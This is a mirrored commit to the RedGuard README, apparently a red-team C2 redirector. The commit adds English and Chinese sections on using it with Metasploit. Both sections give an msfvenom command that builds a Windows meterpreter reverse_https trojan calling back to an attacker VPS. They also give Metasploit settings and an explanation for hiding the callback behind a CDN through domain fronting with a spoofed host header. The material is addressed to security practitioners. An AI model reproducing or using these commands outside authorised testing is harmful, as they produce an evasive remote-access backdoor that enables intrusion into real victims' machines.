mirror of
https://github.com/wikiZ/RedGuard
synced 2026-06-08 18:18:32 +00:00
Update README
This commit is contained in:
@@ -308,6 +308,33 @@ And because our basic verification is based on the HTTP HOST request header, wha
|
||||
|
||||
For the listener settings, the online port is set to the RedGuard reverse proxy port, and the listening port is the actual online port of the local machine.
|
||||
|
||||
## Metasploit
|
||||
|
||||
**Generates Trojan**
|
||||
|
||||
```bash
|
||||
$ msfvenom -p windows/meterpreter/reverse_https LHOST=vpsip LPORT=443 HttpHostHeader=360.com
|
||||
-f exe -o ~/path/to/payload.exe
|
||||
```
|
||||
|
||||
Of course, as a domain fronting scenario, you can also configure your LHOST to use any domain name of the manufacturer's CDN, and pay attention to setting the HttpHostHeader to match RedGuard.
|
||||
|
||||
```bash
|
||||
setg OverrideLHOST 360.com
|
||||
setg OverrideLPORT 443
|
||||
setg OverrideRequestHost true
|
||||
```
|
||||
|
||||
It is important to note that the `OverrideRequestHost` setting must be set to `true`. This is due to a quirk in the way Metasploit handles incoming HTTP/S requests by default when generating configuration for staging payloads. By default, Metasploit uses the incoming request's `Host` header value (if present) for second-stage configuration instead of the `LHOST` parameter. Therefore, the build stage is configured to send requests directly to your hidden domain name because CloudFront passes your internal domain in the `Host` header of forwarded requests. This is clearly not what we are asking for. Using the `OverrideRequestHost` configuration value, we can force Metasploit to ignore the incoming `Host` header and instead use the `LHOST` configuration value pointing to the origin CloudFront domain.
|
||||
|
||||
The listener is set to the actual line port that matches the address RedGuard actually forwards to.
|
||||
|
||||

|
||||
|
||||
RedGuard received the request:
|
||||
|
||||

|
||||
|
||||
# 0x05 Loading
|
||||
|
||||
Thank you for your support. RedGuard will continue to improve and update it. I hope that RedGuard can be known to more security practitioners. The tool refers to the design ideas of RedWarden.
|
||||
|
||||
@@ -308,6 +308,33 @@ RedGuard是支持域前置的,在我看来一共有两种展现形式,一种
|
||||
|
||||
对于监听器的设置上线端口设置为RedGuard反向代理端口,监听端口为本机实际上线端口。
|
||||
|
||||
## Metasploit上线
|
||||
|
||||
**生成木马**
|
||||
|
||||
```bash
|
||||
$ msfvenom -p windows/meterpreter/reverse_https LHOST=vpsip LPORT=443 HttpHostHeader=360.com
|
||||
-f exe -o ~/path/to/payload.exe
|
||||
```
|
||||
|
||||
当然作为域前置场景也可以把你的LHOST配置为任意使用该厂商CDN的域名,注意设置HttpHostHeader与RedGuard相符即可。
|
||||
|
||||
```bash
|
||||
setg OverrideLHOST 360.com
|
||||
setg OverrideLPORT 443
|
||||
setg OverrideRequestHost true
|
||||
```
|
||||
|
||||
请务必注意,该`OverrideRequestHost`设置必须设置为`true`。这是由于 Metasploit 在为暂存有效负载生成配置时默认处理传入 HTTP/S 请求的方式的一个怪癖。默认情况下,Metasploit 将传入请求的`Host`标头值(如果存在)用于第二阶段配置,而不是`LHOST`参数。因此,将生成阶段配置,以便将请求直接发送到您的隐藏域名,因为 CloudFront 在转发请求的`Host`标头中传递您的内部域。这显然不是我们所要求的。使用`OverrideRequestHost`配置值,我们可以强制 Metasploit 忽略传入`Host`的标头,而是使用`LHOST`指向原始 CloudFront 域的配置值。
|
||||
|
||||
监听器设置为实际上线端口,与RedGuard实际转发到的地址相匹配。
|
||||
|
||||

|
||||
|
||||
RedGuard接收到请求:
|
||||
|
||||

|
||||
|
||||
# 0x05 Loading
|
||||
|
||||
感谢各位用户的支持,RedGuard也会坚持进行完善更新的,希望 RedGuard 能够让更多安全从业者所知,工具参考了RedWarden的设计思想。
|
||||
|
||||
Reference in New Issue
Block a user